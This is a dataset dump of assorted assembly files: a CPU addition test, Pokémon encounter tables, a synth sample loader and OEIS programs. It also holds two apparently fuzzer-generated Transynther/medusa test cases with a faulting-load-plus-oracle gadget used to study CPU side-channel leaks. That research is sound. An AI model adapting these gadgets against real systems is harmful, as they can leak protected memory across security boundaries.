hexsha stringlengths 40 40 | size int64 6 1.05M | ext stringclasses 3 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 232 | max_stars_repo_name stringlengths 7 106 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 7 | max_stars_count int64 1 33.5k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 232 | max_issues_repo_name stringlengths 7 106 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 7 | max_issues_count int64 1 37.5k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 232 | max_forks_repo_name stringlengths 7 106 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 7 | max_forks_count int64 1 12.6k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 6 1.05M | avg_line_length float64 1.16 19.7k | max_line_length int64 2 938k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7e6e1df4922f404ea336984cd57b94532d484ffc | 2,839 | asm | Assembly | testcases/add32.asm | Asintoerr/A-Sin-To-Err | daae36051f8c2a4ce1033631d86a4a3adf8e20f7 | [
"MIT"
] | null | null | null | testcases/add32.asm | Asintoerr/A-Sin-To-Err | daae36051f8c2a4ce1033631d86a4a3adf8e20f7 | [
"MIT"
] | null | null | null | testcases/add32.asm | Asintoerr/A-Sin-To-Err | daae36051f8c2a4ce1033631d86a4a3adf8e20f7 | [
"MIT"
] | null | null | null | ; 32 bit addition test case
#define FIRST_OPERAND $0 ; 32 bits = 8 nibbles
#define SECOND_OPERAND $8
#define OPERATION_RESULT $10
; Variable initialization
lit #$6
st FIRST_OPERAND+0
lit #$2
st FIRST_OPERAND+1
lit #$3
st FIRST_OPERAND+2
lit #$b
st FIRST_OPERAND+3
lit #$f
st FIRST_OPERAND+4
lit #$4
st FIRST_OPERAND+5
lit #$0
st FIRST_OPERAND+6
lit #$e
st FIRST_OPERAND+7
lit #$5
st SECOND_OPERAND+0
lit #$f
st SECOND_OPERAND+1
lit #$d
st SECOND_OPERAND+2
lit #$6
st SECOND_OPERAND+3
lit #$8
st SECOND_OPERAND+4
lit #$4
st SECOND_OPERAND+5
lit #$a
st SECOND_OPERAND+6
lit #$1
st SECOND_OPERAND+7
u32addition:
ld FIRST_OPERAND+0 ;
addm SECOND_OPERAND+0 ;
st OPERATION_RESULT+0 ;
jnc + ;
ld FIRST_OPERAND+1 ;--------------
addi #1
jnc ++
ld SECOND_OPERAND+1 ; carry from adding 1 means accumulator is zero
st OPERATION_RESULT+1
jmp +++
+ ld FIRST_OPERAND+1 ;
++ addm SECOND_OPERAND+1 ;
st OPERATION_RESULT+1 ;
jnc + ;
+++ ld FIRST_OPERAND+2 ;--------------
addi #1
jnc ++
ld SECOND_OPERAND+2
st OPERATION_RESULT+2
jmp +++
+ ld FIRST_OPERAND+2 ;
++ addm SECOND_OPERAND+2 ;
st OPERATION_RESULT+2 ;
jnc + ;
+++ ld FIRST_OPERAND+3 ;--------------
addi #1
jnc ++
ld SECOND_OPERAND+3
st OPERATION_RESULT+3
jmp +++
+ ld FIRST_OPERAND+3 ;
++ addm SECOND_OPERAND+3 ;
st OPERATION_RESULT+3 ;
jnc + ;
+++ ld FIRST_OPERAND+4 ;--------------
addi #1
jnc ++
ld SECOND_OPERAND+4
st OPERATION_RESULT+4
jmp +++
+ ld FIRST_OPERAND+4 ;
++ addm SECOND_OPERAND+4 ;
st OPERATION_RESULT+4 ;
jnc + ;
+++ ld FIRST_OPERAND+5 ;--------------
addi #1
jnc ++
ld SECOND_OPERAND+5
st OPERATION_RESULT+5
jmp +++
+ ld FIRST_OPERAND+5 ;
++ addm SECOND_OPERAND+5 ;
st OPERATION_RESULT+5 ;
jnc + ;
+++ ld FIRST_OPERAND+6 ;--------------
addi #1
jnc ++
ld SECOND_OPERAND+6
st OPERATION_RESULT+6
jmp +++
+ ld FIRST_OPERAND+6 ;
++ addm SECOND_OPERAND+6 ;
st OPERATION_RESULT+6 ;
jnc + ;
+++ ld FIRST_OPERAND+7 ;--------------
addi #1
jnc ++
ld SECOND_OPERAND+7
st OPERATION_RESULT+7
jmp +++
+ ld FIRST_OPERAND+7 ;
++ addm SECOND_OPERAND+7 ;
st OPERATION_RESULT+7 ;
halt:
+++ jmp halt | 22.712 | 77 | 0.49454 |
ae42b81419ed3e81b3bac6934a3a417da73a3690 | 346 | asm | Assembly | data/wildPokemon/route21.asm | adhi-thirumala/EvoYellow | 6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c | [
"Unlicense"
] | null | null | null | data/wildPokemon/route21.asm | adhi-thirumala/EvoYellow | 6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c | [
"Unlicense"
] | null | null | null | data/wildPokemon/route21.asm | adhi-thirumala/EvoYellow | 6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c | [
"Unlicense"
] | null | null | null | Route21Mons:
db $19
db 15,MURKROW
db 13,TAUROS
db 13,SKARMORY
db 11,TANGELA
db 17,SKARMORY
db 15,PIDGEY
db 15,RATICATE
db 17,TANGELA
db 20,NOCTOWL
db 15,PIDGEOTTO
db $05
db 5,CHINCHOU
db 10,CHINCHOU
db 15,CHINCHOU
db 5,TENTACOOL
db 10,TENTACOOL
db 15,TENTACOOL
db 20,TENTACOOL
db 30,LANTURN
db 35,LANTURN
db 40,TENTACRUEL
| 13.307692 | 17 | 0.734104 |
73c05143ea222671a4012ae3466ec9decb2a25db | 2,048 | asm | Assembly | templates/amd64-386/gmdls.asm | going-digital/sointu | 60e45182301be0c1cdcca48a0100133f63000e7d | [
"MIT"
] | 76 | 2020-07-15T04:33:30.000Z | 2022-03-21T02:51:31.000Z | templates/amd64-386/gmdls.asm | going-digital/sointu | 60e45182301be0c1cdcca48a0100133f63000e7d | [
"MIT"
] | 85 | 2020-05-26T06:28:50.000Z | 2022-03-23T16:20:14.000Z | templates/amd64-386/gmdls.asm | going-digital/sointu | 60e45182301be0c1cdcca48a0100133f63000e7d | [
"MIT"
] | 3 | 2020-10-16T21:26:48.000Z | 2021-05-17T11:18:58.000Z | {{- if .SupportsParamValue "oscillator" "type" .Sample}}
{{- if eq .OS "windows"}}
{{.ExportFunc "su_load_gmdls"}}
{{- if .Amd64}}
extern OpenFile ; requires windows
extern ReadFile ; requires windows
; Win64 ABI: RCX, RDX, R8, and R9
sub rsp, 40 ; Win64 ABI requires "shadow space" + space for one parameter.
mov rdx, qword su_sample_table
mov rcx, qword su_gmdls_path1
xor r8,r8 ; OF_READ
push rdx ; &ofstruct, blatantly reuse the sample table
push rcx
call OpenFile ; eax = OpenFile(path,&ofstruct,OF_READ)
pop rcx
pop rdx
movsxd rcx, eax
mov qword [rsp+32], 0
mov r9, rdx
mov r8d, 3440660 ; number of bytes to read
call ReadFile ; Readfile(handle,&su_sample_table,SAMPLE_TABLE_SIZE,&bytes_read,NULL)
add rsp, 40 ; shadow space, as required by Win64 ABI
ret
{{else}}
mov ebx, su_sample_table
push 0 ; OF_READ
push ebx ; &ofstruct, blatantly reuse the sample table
push su_gmdls_path1 ; path
call dword [__imp__OpenFile@12]; eax = OpenFile(path,&ofstruct,OF_READ) // should not touch ebx according to calling convention
push 0 ; NULL
push ebx ; &bytes_read, reusing sample table again; it does not matter that the first four bytes are trashed
push 3440660 ; number of bytes to read
push ebx ; here we actually pass the sample table to readfile
push eax ; handle to file
call dword [__imp__ReadFile@20] ; Readfile(handle,&su_sample_table,SAMPLE_TABLE_SIZE,&bytes_read,NULL)
ret
extern __imp__OpenFile@12 ; requires windows
extern __imp__ReadFile@20
; requires windows
{{end}}
{{.Data "su_gmdls_path1"}}
db 'drivers/gm.dls',0
{{end}}
{{.SectBss "susamtable"}}
su_sample_table:
resb 3440660 ; size of gmdls.
{{end}}
| 40.156863 | 135 | 0.597168 |
a9a0fb9fdf7c5c258faad7f8284d3d0ab129022b | 370 | asm | Assembly | programs/oeis/127/A127648.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/127/A127648.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/127/A127648.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A127648: Triangle read by rows: row n consists of n zeros followed by n+1.
; 1,0,2,0,0,3,0,0,0,4,0,0,0,0,5,0,0,0,0,0,6,0,0,0,0,0,0,7,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,9,0,0,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,11,0,0,0,0,0,0,0,0,0,0,0,12,0,0,0,0,0,0,0,0,0,0,0,0,13,0,0,0,0,0,0,0,0,0
mov $1,1
lpb $0
add $1,1
sub $0,$1
lpe
lpb $0
mov $0,0
mov $1,0
lpe
mov $0,$1
| 26.428571 | 205 | 0.554054 |
c3fac8d500c797424b9a08910dc85fff1e58bfa0 | 706 | asm | Assembly | oeis/060/A060946.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/060/A060946.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/060/A060946.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A060946: Trace of Vandermonde matrix of numbers 1,2,...,n, i.e., the matrix A with A[i,j] = i^(j-1), 1 <= i <= n, 1 <= j <= n.
; 1,3,12,76,701,8477,126126,2223278,45269999,1045269999,26982694600,769991065288,24068076187769,817782849441913,30010708874832538,1182932213481679514,49844124089148547995,2235755683827845079963,106363105981739086612804,5349243105981739086612804,283567672552933287723809205,15803016643653822260298660277,923649451419649997667039221606,56495973486848155183045433923430,3609209652287349084538666771814055,240383039660254937961333831710283431,16663586307920913084192801632419538720
mov $3,1
lpb $0
mov $2,$3
add $2,$0
pow $2,$0
sub $0,1
add $1,$2
lpe
mov $0,$1
add $0,1
| 50.428571 | 477 | 0.803116 |
7ecc44dfa8ae076c68e106ec9ccda1e31d08dbf7 | 5,155 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1824.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1824.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1824.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r14
push %r15
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x18a17, %rbp
clflush (%rbp)
nop
nop
nop
and %rdx, %rdx
mov $0x6162636465666768, %r15
movq %r15, %xmm2
movups %xmm2, (%rbp)
nop
xor %r14, %r14
lea addresses_A_ht+0x18fd7, %rcx
inc %r11
movl $0x61626364, (%rcx)
nop
dec %r14
lea addresses_WC_ht+0x1edc7, %rsi
lea addresses_normal_ht+0x13aef, %rdi
nop
dec %rdx
mov $29, %rcx
rep movsw
nop
nop
and $31703, %rbp
lea addresses_WT_ht+0x157d7, %rbp
add $19915, %rcx
movl $0x61626364, (%rbp)
nop
nop
nop
dec %rcx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %r15
pop %r14
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r11
push %r12
push %r14
push %r15
push %rcx
push %rdx
// Store
lea addresses_A+0x1c1d7, %r11
nop
xor %r10, %r10
movw $0x5152, (%r11)
nop
nop
nop
nop
nop
add $22023, %r10
// Faulty Load
lea addresses_RW+0xbdd7, %rdx
sub %r15, %r15
vmovups (%rdx), %ymm7
vextracti128 $1, %ymm7, %xmm7
vpextrq $1, %xmm7, %rcx
lea oracles, %rdx
and $0xff, %rcx
shlq $12, %rcx
mov (%rdx,%rcx,1), %rcx
pop %rdx
pop %rcx
pop %r15
pop %r14
pop %r12
pop %r11
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_RW', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_RW', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 9, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 4, 'same': True}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 3, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 9, 'same': False}}
{'32': 21829}
32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32
*/
| 47.293578 | 2,999 | 0.660912 |
dccf34bb4656a38bc295f87bf9d081c42273c3c7 | 7,476 | asm | Assembly | source/phase_vertex_cc.asm | stanford-mast/Grazelle-PPoPP18 | 5c95c1d498a3935a6e40202c34d5f32653132c1c | [
"BSD-3-Clause"
] | 19 | 2018-02-27T14:00:28.000Z | 2022-01-14T02:53:50.000Z | source/phase_vertex_cc.asm | stanford-mast/Grazelle-PPoPP18 | 5c95c1d498a3935a6e40202c34d5f32653132c1c | [
"BSD-3-Clause"
] | 4 | 2018-03-02T13:59:05.000Z | 2022-01-19T12:20:50.000Z | source/phase_vertex_cc.asm | stanford-mast/Grazelle-PPoPP18 | 5c95c1d498a3935a6e40202c34d5f32653132c1c | [
"BSD-3-Clause"
] | 1 | 2019-04-10T18:20:47.000Z | 2019-04-10T18:20:47.000Z | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Grazelle
; High performance, hardware-optimized graph processing engine.
; Targets a single machine with one or more x86-based sockets.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Authored by Samuel Grossman
; Department of Electrical Engineering, Stanford University
; (c) 2015-2018
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; phase_vertex_cc.asm
; Implementation of the Vertex phase for Connected Components.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
INCLUDE constants.inc
INCLUDE graphdata.inc
INCLUDE phasehelpers.inc
INCLUDE registers.inc
INCLUDE threadhelpers.inc
_TEXT SEGMENT
; --------- MACROS ------------------------------------------------------------
; Initializes required state for the Vertex phase.
vertex_op_initialize MACRO
; perform common initialization tasks
phase_helper_set_base_addrs
; compensate for the first vertex assigned to be processed (assignment passed as a parameter in rcx)
shr rcx, 3
add r_vaccum, rcx
ENDM
; Performs an iteration of the Vertex phase at the specified index.
vertex_op_iteration_at_index MACRO
; calculate the base index for write, which is just (index << 3)
; to get a byte offset, just multiply by 8 (another << 3)
mov r_woffset, rcx
shl r_woffset, 6
; zero out the assigned vertices in the accumulators
vmovntpd YMMWORD PTR [r_vaccum+r_woffset+0], ymm_caccum1
vmovntpd YMMWORD PTR [r_vaccum+r_woffset+32], ymm_caccum2
ENDM
; Performs an iteration of the Vertex phase at the specified index.
; This is the non-vectorized version.
vertex_op_iteration_at_index_novec MACRO
; calculate the base index for write, which is just (index << 0)
; to get a byte offset, just multiply by 8 (another << 3)
mov r_woffset, rcx
shl r_woffset, 3
; zero out the assigned vertex in the accumulator
movnti QWORD PTR [r_vaccum+r_woffset], r10
ENDM
; --------- PHASE CONTROL FUNCTION --------------------------------------------
; See "phases.h" for documentation.
perform_vertex_phase_cc PROC PUBLIC
; save non-volatile registers used throughout this phase
push rbx
push rsi
push rdi
push r12
push r13
push r14
push r15
; initialize
vertex_op_initialize
IFDEF EXPERIMENT_WITHOUT_VECTORS
; the job of this phase is to zero out the accumulator, so create a zero-valued register for that purpose
xor r10, r10
ELSE
; the job of this phase is to zero out the accumulator, so initialize some AVX registers for that purpose
vxorpd ymm_caccum1, ymm_caccum1, ymm_caccum1
vxorpd ymm_caccum2, ymm_caccum2, ymm_caccum2
ENDIF
; calculate the number of total iterations across all threads based on the number of vertices
; by the time this is done, rdx stores the number of iterations
IFDEF EXPERIMENT_WITHOUT_VECTORS
; where V is the number of vertices, number of iterations is equal to (V/64) + (V%64 ? 1 : 0)
; number of vertices is passed in rdx
mov rcx, rdx
shr rdx, 6
and rcx, 63
ELSE
; where V is the number of vertices, number of iterations is equal to (V/512) + (V%512 ? 1 : 0)
; number of vertices is passed in rdx
mov rcx, rdx
shr rdx, 9
and rcx, 511
ENDIF
je skip_add_extra_iteration
inc rdx
skip_add_extra_iteration:
; extract thread information useful as loop controls, assigning chunks to each thread round-robin
; formulas:
; assignment = #iterations / #total_threads
; addon = #iterations % #total_threads < global_thread_id ? 1 : 0
; prev_addons = min(#iterations % #total_threads, global_thread_id)
;
; base (rsi) = (assignment * global_thread_id) + prev_addons
; inc = 1
; max (rdi) = base + assignment + addon - 1
; first, perform the unsigned division by setting rdx:rax = #iterations and dividing by #total_threads
; afterwards, rax contains the quotient ("assignment" in the formulas above) and rdx contains the remainder
mov rax, rdx
xor rdx, rdx
xor rcx, rcx
threads_helper_get_threads_per_group ecx
div rcx
; to calculate other values using total_threads, extract it to rcx
; can be used directly to obtain "addon" (rbx) and "prev_addons" (rsi)
threads_helper_get_local_thread_id ecx
xor rbx, rbx
mov rsi, rdx
mov rdi, 0000000000000001h
cmp rcx, rdx
cmovl rbx, rdi
cmovl rsi, rcx
; create some partial values using the calculated quantities
; rsi (base) = prev_addons - this was done above, rdi (max) = assignment + addon - 1
; note that because we are using "jge" below and not "jg", we skip the -1, since "jge" requires that rdi be (last index to process + 1)
mov rdi, rax
add rdi, rbx
; perform multiplication of assignment * total_threads, result in rax
; use the result to add to rsi and figure out "base", then add to rdi to get "max"
mul rcx
add rsi, rax
add rdi, rsi
; main Vertex phase loop
vertex_phase_loop:
cmp rsi, rdi
jge done_vertex_loop
mov rcx, rsi
IFDEF EXPERIMENT_WITHOUT_VECTORS
vertex_op_iteration_at_index_novec
ELSE
vertex_op_iteration_at_index
ENDIF
inc rsi
jmp vertex_phase_loop
done_vertex_loop:
; restore non-volatile registers and return
pop r15
pop r14
pop r13
pop r12
pop rdi
pop rsi
pop rbx
ret
perform_vertex_phase_cc ENDP
_TEXT ENDS
END
| 42.237288 | 139 | 0.490637 |
88f6a37a8b9af0f3725b54530e7a1a22bab718c8 | 6,570 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xa0.log_21829_699.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xa0.log_21829_699.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xa0.log_21829_699.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r12
push %r13
push %r14
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0x631a, %rdi
clflush (%rdi)
nop
nop
and $52329, %rdx
movb $0x61, (%rdi)
nop
nop
dec %r11
lea addresses_UC_ht+0x11b5a, %r13
nop
nop
nop
inc %r14
vmovups (%r13), %ymm0
vextracti128 $1, %ymm0, %xmm0
vpextrq $1, %xmm0, %r11
nop
nop
add $63729, %r10
lea addresses_A_ht+0x694a, %rdx
nop
and %r12, %r12
mov $0x6162636465666768, %rdi
movq %rdi, (%rdx)
nop
nop
nop
nop
cmp %r11, %r11
lea addresses_WC_ht+0xf096, %r11
nop
add %r10, %r10
and $0xffffffffffffffc0, %r11
movntdqa (%r11), %xmm3
vpextrq $0, %xmm3, %rdx
cmp $6235, %r11
lea addresses_WT_ht+0x1135a, %rsi
lea addresses_WT_ht+0x13d65, %rdi
sub %r14, %r14
mov $24, %rcx
rep movsw
nop
nop
nop
nop
nop
add $9138, %rcx
lea addresses_A_ht+0x1035a, %r12
nop
nop
nop
nop
lfence
mov $0x6162636465666768, %rdx
movq %rdx, %xmm7
movups %xmm7, (%r12)
nop
nop
cmp $38076, %rsi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %r14
pop %r13
pop %r12
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r12
push %r13
push %r8
push %rax
push %rbp
push %rsi
// Store
mov $0x776f74000000047a, %r13
clflush (%r13)
nop
nop
nop
nop
nop
add %r10, %r10
mov $0x5152535455565758, %rax
movq %rax, %xmm5
vmovups %ymm5, (%r13)
nop
nop
nop
nop
and $61076, %r13
// Load
lea addresses_WT+0x1766a, %r13
nop
nop
nop
nop
sub $50224, %rsi
vmovups (%r13), %ymm2
vextracti128 $1, %ymm2, %xmm2
vpextrq $0, %xmm2, %r10
nop
add %r12, %r12
// Store
mov $0x5691e90000000b18, %r10
xor %rbp, %rbp
movw $0x5152, (%r10)
nop
nop
sub $27895, %rax
// Store
lea addresses_normal+0x9132, %r13
nop
nop
nop
xor $12653, %rax
movw $0x5152, (%r13)
nop
nop
nop
cmp $35572, %rax
// Faulty Load
lea addresses_RW+0xcb5a, %r8
nop
nop
nop
nop
add $27107, %rsi
mov (%r8), %r12d
lea oracles, %r13
and $0xff, %r12
shlq $12, %r12
mov (%r13,%r12,1), %r12
pop %rsi
pop %rbp
pop %rax
pop %r8
pop %r13
pop %r12
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': True, 'same': False, 'congruent': 0, 'type': 'addresses_RW', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 5, 'type': 'addresses_NC', 'AVXalign': False, 'size': 32}}
{'src': {'NT': False, 'same': False, 'congruent': 1, 'type': 'addresses_WT', 'AVXalign': False, 'size': 32}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': True, 'same': False, 'congruent': 1, 'type': 'addresses_NC', 'AVXalign': False, 'size': 2}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_normal', 'AVXalign': False, 'size': 2}}
[Faulty Load]
{'src': {'NT': True, 'same': True, 'congruent': 0, 'type': 'addresses_RW', 'AVXalign': False, 'size': 4}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 6, 'type': 'addresses_WC_ht', 'AVXalign': True, 'size': 1}}
{'src': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 32}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 8}}
{'src': {'NT': True, 'same': False, 'congruent': 2, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 9, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 0, 'type': 'addresses_WT_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16}}
{'32': 21829}
